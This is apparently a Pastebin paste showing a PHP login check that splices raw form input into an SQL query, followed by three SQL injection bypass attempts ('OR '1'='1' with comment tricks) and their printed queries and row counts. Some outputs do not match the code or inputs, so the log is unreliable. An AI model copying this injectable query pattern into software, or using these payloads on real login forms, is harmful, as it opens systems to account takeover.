Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $email = $_POST['u_email'];
- $password = $_POST['u_password'];
- $query = "SELECT * FROM User WHERE EMAIL='$email' AND PASSWORD='$password'";
- $result = $mysqli->query($query);
- $counter = mysqli_num_rows($result);
- echo "Counter: " . $counter . '<br>';
- echo "Query: " . $query;
- if($counter == 1)//Correct Login
- Input
- Username: abc@gmail.com' OR '1'='1/*
- Password: */
- Output
- Counter: 1
- Query: SELECT * FROM Usuario WHERE EMAIL='abc@gmail.com' OR '1'='1/*' AND PASSWORD='*/'
- SELECT * FROM Usuario WHERE EMAIL='aa115@ikasle.ehu.es' OR '1'='1'
- Input
- Username: xxx' OR '1'='1/*
- Password: */
- Output
- Counter: 0
- Query: SELECT * FROM Usuario WHERE EMAIL='xxx' OR '1'='1/*' AND PASSWORD='*/'
- SELECT * FROM Usuario WHERE EMAIL='xxx' OR '1'='1'
- Input
- Username: abc@gmail.com/*
- Password: */
- Output
- Counter: 0
- Query: SELECT * FROM Usuario WHERE EMAIL='abc@gmail.com/*' AND PASSWORD='*/'
- SELECT * FROM Usuario WHERE EMAIL='xxx' OR '1'='1'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
